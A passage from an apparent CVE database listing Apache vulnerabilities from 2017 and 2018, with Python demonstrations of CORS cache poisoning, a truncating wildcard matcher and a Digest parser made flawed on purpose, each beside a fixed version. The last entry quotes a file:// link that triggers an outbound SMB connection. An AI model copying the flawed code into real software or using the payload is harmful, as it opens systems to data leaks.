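        self.backend = backend   # origin server: Origin value -> response headers
        self.entries = {}        # url -> list of (vary_fields, response headers)
        self.hits = 0

    def get(self, url: str, req_headers: Dict[str, str]) -> Dict[str, str]:
        req = {k.lower(): v for k, v in req_headers.items()}
        for vary_fields, resp in self.entries.get(url, []):
            # An empty vary_fields tuple matches every request: that is the poison.
            if all(req.get(name, "") == value for name, value in vary_fields):
                self.hits += 1
                return resp
        resp = self.backend(req.get("origin"))
        names = [n.strip().lower() for n in resp.get("Vary", "").split(",") if n.strip()]
        vary_fields = tuple((n, req.get(n, "")) for n in names)
        self.entries.setdefault(url, []).append((vary_fields, resp))
        return resp


def poison_demo(add_vary: bool) -> Tuple[List[Optional[str]], int]:
    """Three requesters share one cache for one URL. Returns the
    Access-Control-Allow-Origin value each of them saw and the cache hit count."""
    cache = SharedCache(lambda origin: cors_filter(origin, add_vary))
    url = "/api/account"
    seen = []
    for req in ({"Origin": "https://app.example"},
                {"Origin": "https://admin.example"},
                {}):  # plain same-origin request with no Origin header
        seen.append(cache.get(url, req).get("Access-Control-Allow-Origin"))
    return seen, cache.hits


if __name__ == "__main__":
    print("without Vary:", poison_demo(False))
    print("with Vary:   ", poison_demo(True))
```

The check a practitioner wants is the same one the cache performs: any response whose headers depend on Origin must carry Vary: Origin, otherwise a browser cache or an upstream proxy will hand one origin's CORS decision to another.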
CVE-2017-7675 MEDIUM

The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M21 and 8.5.0 to 8.5.15 bypassed a number of security checks that prevented directory traversal attacks. It was therefore possible to bypass security constraints using a specially crafted URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.15
apache tomcat 8.5.8
apache tomcat 8.5.13
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
apache tomcat 8.5.14
CVE-2017-7676 HIGH

The policy resource matcher in Apache Ranger before 0.7.1 ignores characters after the '*' wildcard character, e.g. in my*test or test*.txt. This can result in unintended behavior.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ranger *
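To see why truncating a pattern at '*' matters, the following added example (not Ranger's own matcher, and it supports only the '*' wildcard) places a matcher that discards everything after the first '*' beside a correct one, and lists the resources the flawed matcher grants but the correct one refuses. The resource names are constructed.

```python
import re


def flawed_match(pattern: str, resource: str) -> bool:
    """Model of the behaviour described above: everything after the first '*'
    is ignored, so 'my*test' silently degrades to the prefix 'my'."""
    star = pattern.find("*")
    if star == -1:
        return pattern == resource
    return resource.startswith(pattern[:star])


def wildcard_match(pattern: str, resource: str) -> bool:
    """Correct matcher: every literal segment between '*' characters must appear
    in order, and the resource must be consumed completely."""
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.fullmatch(regex, resource, flags=re.DOTALL) is not None


def over_granted(pattern: str, resources) -> list:
    """Resources the flawed matcher grants that the correct matcher does not."""
    return sorted(r for r in resources
                  if flawed_match(pattern, r) and not wildcard_match(pattern, r))


# Constructed resource names, not taken from any real deployment.
SAMPLE_RESOURCES = ["mytest", "my_unit_test", "mysecret.db",
                    "test1.txt", "test.txt", "testdata.csv", "other"]

if __name__ == "__main__":
    for pattern in ("my*test", "test*.txt"):
        print(pattern, "over-grants:", over_granted(pattern, SAMPLE_RESOURCES))
```

Running over_granted against an export of real policy patterns and resource names is a quick way to find policies that were granting more than their authors intended before the upgrade.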
CVE-2017-7677 MEDIUM

In environments that use an external location for Hive tables, the Hive Authorizer in Apache Ranger before 0.7.1 does not check RWX permission on that location when a table is created.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ranger *
CVE-2017-7678 MEDIUM

In Apache Spark before 2.2.0, it is possible for an attacker to take advantage of a user's trust in the server to trick them into visiting a link that points to a shared Spark cluster and submits data including MHTML to the Spark master, or history server. This data, which could contain a script, would then be reflected back to the user and could be evaluated and executed by MS Windows-based clients. It is not an attack on Spark itself, but on the user, who may then execute the script inadvertently when viewing elements of the Spark web UIs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache spark *
CVE-2017-7679 HIGH

In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, mod_mime can read one byte past the end of a buffer when sending a malicious Content-Type response header.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-126,CWE-119,

Products Affected

Vendor Product Version
apache http_server *
CVE-2017-7680 MEDIUM

Apache OpenMeetings 1.0.0 has an overly permissive crossdomain.xml file. This allows for flash content to be loaded from untrusted domains.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7681 MEDIUM

Apache OpenMeetings 1.0.0 is vulnerable to SQL injection. This allows authenticated users to modify the structure of the existing query and leak the structure of other queries being made by the application in the back-end.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7682 MEDIUM

Apache OpenMeetings 3.2.0 is vulnerable to parameter manipulation attacks; as a result an attacker can gain access to restricted areas.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.2.0
apache openmeetings 3.2.1
CVE-2017-7683 MEDIUM

Apache OpenMeetings 1.0.0 discloses the Tomcat version and detailed error stack traces, which is not secure.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7684 MEDIUM

Apache OpenMeetings 1.0.0 doesn't check contents of files being uploaded. An attacker can cause a denial of service by uploading multiple large files to the server.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7685 MEDIUM

Apache OpenMeetings 1.0.0 responds to the following insecure HTTP methods: PUT, DELETE, HEAD, and PATCH.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7686 MEDIUM

Apache Ignite 1.0.0-RC3 to 2.0 uses an update notifier component to notify users about new project releases that include additional functionality, bug fixes and performance improvements. To do that the component communicates with an external PHP server (http://ignite.run), to which it sends some system properties such as the Apache Ignite or Java version. Some of these properties might contain sensitive user information.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ignite 1.9.0
apache ignite 1.8.0
apache ignite 1.6.0
apache ignite 1.7.0
apache ignite 1.3.0
apache ignite 1.5.0
apache ignite 1.1.0
apache ignite 1.4.0
apache ignite 1.2.0
apache ignite 1.0.0
apache ignite 2.0.0
CVE-2017-7687 MEDIUM

When handling a decoding failure for a malformed URL path of an HTTP request, libprocess in Apache Mesos before 1.1.3, 1.2.x before 1.2.2, 1.3.x before 1.3.1, and 1.4.0-dev might crash because the code accidentally calls an inappropriate function. A malicious actor can therefore cause a denial of service of Mesos masters, rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.4.0-dev
apache mesos 1.2.0
apache mesos 1.2.1
apache mesos 1.3.0
apache mesos 1.3.1
CVE-2017-7688 MEDIUM

Apache OpenMeetings 1.0.0 updates user passwords in an insecure manner.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-9787 MEDIUM

When using Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. The solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.27
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.24.1
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9788 MEDIUM

In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of potentially confidential information, and a segfault in other cases resulting in denial of service.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,CWE-200,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
apache http_server *
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
netapp storage_automation_store -
redhat jboss_enterprise_application_platform 6.0.0
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_server_eus 7.3
redhat jboss_core_services 1.0
redhat enterprise_linux_server_eus 6.7
redhat enterprise_linux_server 6.0
redhat jboss_enterprise_application_platform 6.4.0
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_server_eus 7.4
apple mac_os_x *
netapp oncommand_unified_manager -
debian debian_linux 9.0
redhat enterprise_linux_server_eus 7.5
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
redhat enterprise_linux_server_eus 7.2
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_workstation 6.0
redhat enterprise_linux_server_eus 7.6
redhat jboss_enterprise_web_server 2.0.0
redhat enterprise_linux_server 7.0
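The failure mode described for CVE-2017-9788 is a parser that carries a value variable across key=value pairs and only assigns it when it sees '='. The following added example is not mod_auth_digest's code; it is a small Python model of that mistake beside the corrected form. The stale sentinel stands in for uninitialised pool memory, and the Digest headers are constructed.

```python
from typing import Dict, List, Optional

STALE = "<<stale pool memory>>"   # stands in for whatever the prior request left behind


def split_params(s: str) -> List[str]:
    """Split a comma-separated auth-param list, leaving commas inside quotes alone."""
    parts, cur, in_quote = [], [], False
    for ch in s:
        if ch == '"':
            in_quote = not in_quote
        if ch == "," and not in_quote:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def _unquote(v: str) -> str:
    v = v.strip()
    return v[1:-1] if len(v) >= 2 and v[0] == v[-1] == '"' else v


def _body(header: str) -> str:
    """Drop the 'Digest ' scheme prefix if present."""
    return header[len("Digest "):].strip() if header.startswith("Digest ") else header.strip()


def parse_digest_stale(header: str) -> Dict[str, str]:
    """Deliberately flawed: 'value' is assigned only when an '=' is seen, so a
    bare key inherits the previous key's value, or STALE if it comes first."""
    params = {}
    value = STALE
    for part in split_params(_body(header)):
        if "=" in part:
            key, value = part.split("=", 1)
            value = _unquote(value)
        else:
            key = part          # no '=': value is never reset
        params[key.strip()] = value
    return params


def parse_digest_safe(header: str) -> Dict[str, Optional[str]]:
    """Fixed form: the value is reset for every key, so a bare key is recorded
    as absent (None) and can never pick up data from another field or request."""
    params = {}
    for part in split_params(_body(header)):
        value = None
        if "=" in part:
            key, value = part.split("=", 1)
            value = _unquote(value)
        else:
            key = part
        params[key.strip()] = value
    return params


# Constructed headers: in both, 'nonce' has no '=' assignment.
SAMPLE = 'Digest username="alice", realm="api, internal", nonce, uri="/index.html"'
SAMPLE_FIRST_BARE = 'Digest nonce, username="alice"'

if __name__ == "__main__":
    print("stale:", parse_digest_stale(SAMPLE))
    print("safe: ", parse_digest_safe(SAMPLE))
    print("stale, bare key first:", parse_digest_stale(SAMPLE_FIRST_BARE))
```

The safe variant's rule is the general one for any key=value header parser: initialise the value inside the loop, never outside it, and treat a key with no assignment as absent rather than as "whatever was there before".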
CVE-2017-9789 MEDIUM

When under stress, closing many connections, the HTTP/2 handling code in Apache httpd 2.4.26 would sometimes access memory after it has been freed, resulting in potentially erratic behaviour.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server 2.4.26
CVE-2017-9790 MEDIUM

When handling a libprocess message wrapped in an HTTP request, libprocess in Apache Mesos before 1.1.3, 1.2.x before 1.2.2, 1.3.x before 1.3.1, and 1.4.0-dev crashes if the request path is empty, because the parser assumes the request path always starts with '/'. A malicious actor can therefore cause a denial of service of Mesos masters rendering the Mesos-controlled cluster inoperable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache mesos *
apache mesos 1.4.0-dev
apache mesos 1.2.0
apache mesos 1.2.1
apache mesos 1.3.0
apache mesos 1.3.1
CVE-2017-9791 HIGH

The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.3.20.1
apache struts 2.3.24
apache struts 2.3.24.3
apache struts 2.3.1.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.3.28.1
apache struts 2.3.4
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.3.1
apache struts 2.3.32
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.3.14
apache struts 2.3.16.3
apache struts 2.3.20.3
apache struts 2.3.1.2
apache struts 2.3.15.1
apache struts 2.3.24.1
apache struts 2.3.16
CVE-2017-9792 MEDIUM

In Apache Impala (incubating) before 2.10.0, a malicious user with "ALTER" permissions on an Impala table can access any other Kudu table data by altering the table properties to make it "external" and then changing the underlying table mapping to point to other Kudu tables. This violates and works around the authorization requirement that creating a Kudu external table via Impala requires an "ALL" privilege at the server scope. This privilege requirement for "CREATE" commands is enforced to precisely avoid this scenario where a malicious user can change the underlying Kudu table mapping. The fix is to enforce the same privilege requirement for "ALTER" commands that would make existing non-external Kudu tables external.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.9.0
CVE-2017-9793 MEDIUM

The REST Plugin in Apache Struts 2.1.x, 2.3.7 through 2.3.33 and 2.5 through 2.5.12 uses an outdated XStream library which is vulnerable and allows a DoS attack using a malicious request with a specially crafted XML payload.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.5.12
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9794 MEDIUM

When a cluster is operating in secure mode, a user with read privileges for specific data regions can use the gfsh command line utility to execute queries. In Apache Geode before 1.2.1, the query results may contain data from another user's concurrently executing gfsh query, potentially revealing data that the user is not authorized to view.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9795 MEDIUM

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries that allow read and write access to objects within unauthorized regions. In addition a user could invoke methods that allow remote code execution.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9796 LOW

When an Apache Geode cluster before v1.3.0 is operating in secure mode, a user with read access to specific regions within a Geode cluster may execute OQL queries containing a region name as a bind parameter that allow read access to objects within unauthorized regions.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9797 MEDIUM

When an Apache Geode cluster before v1.2.1 is operating in secure mode, an unauthenticated client can enter multi-user authentication mode and send metadata messages. These metadata operations could leak information about application data types. In addition, an attacker could perform a denial of service attack on the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-9798 MEDIUM

Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-416,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apache http_server *
apache http_server 2.4.25
apache http_server 2.4.0
debian debian_linux 9.0
debian debian_linux 7.0
apache http_server 2.4.23
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.20
apache http_server 2.4.12
apache http_server 2.4.18
debian debian_linux 8.0
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.16
apache http_server 2.4.26
apache http_server 2.4.10
apache http_server 2.4.1
apache http_server 2.4.17
apache http_server 2.4.9
apache http_server 2.4.27
CVE-2017-9799 MEDIUM

It was found that under some situations and configurations of Apache Storm 1.x before 1.0.4 and 1.1.x before 1.1.1, it is theoretically possible for the owner of a topology to trick the supervisor to launch a worker as a different, non-root, user. In the worst case this could lead to secure credentials of the other user being compromised.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache storm 1.0.2
apache storm 1.1
apache storm 1.0.3
apache storm 1.0
apache storm 1.0.1
CVE-2017-9800 HIGH

A maliciously constructed svn+ssh:// URL would cause Subversion clients before 1.8.19, 1.9.x before 1.9.7, and 1.10.0.x through 1.10.0-alpha3 to run an arbitrary shell command. Such a URL could be generated by a malicious server, by a malicious user committing to an honest server (to attack another user of that server's repositories), or by a proxy server. The vulnerability affects all clients, including those that use file://, http://, and plain (untunneled) svn://.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache subversion 1.10.0
apache subversion 1.9.1
apache subversion 1.9.2
apache subversion 1.9.5
apache subversion 1.9.0
apache subversion 1.9.6
apache subversion *
apache subversion 1.9.3
apache subversion 1.9.4
CVE-2017-9801 MEDIUM

When a call-site passes a subject for an email that contains line-breaks in Apache Commons Email 1.0 through 1.4, the caller can add arbitrary SMTP headers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache commons_email 1.3.3
apache commons_email 1.2
apache commons_email 1.3.2
apache commons_email 1.0
apache commons_email 1.4
apache commons_email 1.3.1
apache commons_email 1.1
apache commons_email 1.3
CVE-2017-9802 MEDIUM

The Javascript method Sling.evalString() in Apache Sling Servlets Post before 2.3.22 uses the javascript 'eval' function to parse input strings, which allows for XSS attacks by passing specially crafted input strings.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache sling_servlets_post *
CVE-2017-9803 MEDIUM

Apache Solr's Kerberos plugin can be configured to use delegation tokens, which allows an application to reuse the authentication of an end-user or another application. There are two issues with this functionality (when using SecurityAwareZkACLProvider type of ACL provider e.g. SaslZkACLProvider). Firstly, access to the security configuration can be leaked to users other than the solr super user. Secondly, malicious users can exploit this leaked configuration for privilege escalation to further expose/modify private data and/or disrupt operations in the Solr cluster. The vulnerability is fixed from Apache Solr 6.6.1 onwards.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache solr 6.4.0
apache solr 6.2.0
apache solr 6.4.2
apache solr 6.5.1
apache solr 6.2.1
apache solr 6.4.1
apache solr 6.3.0
apache solr 6.5.0
apache solr 6.6.0
CVE-2017-9804 MEDIUM

In Apache Struts 2.3.7 through 2.3.33 and 2.5 through 2.5.12, if an application allows entering a URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL. NOTE: this vulnerability exists because of an incomplete fix for S2-047 / CVE-2017-7672.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.3.20
apache struts 2.3.17
apache struts 2.3.14.1
apache struts 2.3.11
apache struts 2.3.16.2
apache struts 2.3.10
apache struts 2.3.24.3
apache struts 2.5.1
apache struts 2.5.3
apache struts 2.5.4
apache struts 2.3.28.1
apache struts 2.3.25
apache struts 2.3.33
apache struts 2.5.10
apache struts 2.3.15.2
apache struts 2.3.16.1
apache struts 2.5.2
apache struts 2.3.32
apache struts 2.5.6
apache struts 2.3.16.3
apache struts 2.3.27
apache struts 2.5.12
apache struts 2.3.15.1
apache struts 2.3.23
apache struts 2.3.13
apache struts 2.5.7
apache struts 2.5
apache struts 2.3.26
apache struts 2.5.8
apache struts 2.3.20.1
apache struts 2.3.29
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.3.31
apache struts 2.5.9
apache struts 2.3.24.2
apache struts 2.5.10.1
apache struts 2.3.30
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.3.22
apache struts 2.3.12
apache struts 2.3.8
apache struts 2.3.19
apache struts 2.3.9
apache struts 2.3.15
apache struts 2.3.28
apache struts 2.5.5
apache struts 2.3.14
apache struts 2.3.21
apache struts 2.3.20.2
apache struts 2.3.16
CVE-2017-9805 MEDIUM

The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H 2.2 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache struts *
cisco digital_media_manager -
cisco video_distribution_suite_for_internet_streaming -
netapp oncommand_balance -
cisco hosted_collaboration_solution 11.6(1)
cisco media_experience_engine 3.5
cisco hosted_collaboration_solution 11.5(1)
cisco media_experience_engine 3.5.2
cisco network_performance_analysis -
cisco hosted_collaboration_solution 11.0(1)
cisco hosted_collaboration_solution 10.5(1)
CVE-2017-9806 MEDIUM

A vulnerability in the OpenOffice Writer DOC file parser before 4.1.4, and specifically in the WW8Fonts Constructor, allows attackers to craft malicious documents that cause denial of service (memory corruption and application crash) potentially resulting in arbitrary code execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2018-1000420 MEDIUM

An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache mesos *
CVE-2018-1000421 MEDIUM

An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to initiate a test connection to an attacker-specified Mesos server with attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
apache mesos *
CVE-2018-10583 MEDIUM

An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.

CVSS 2.0

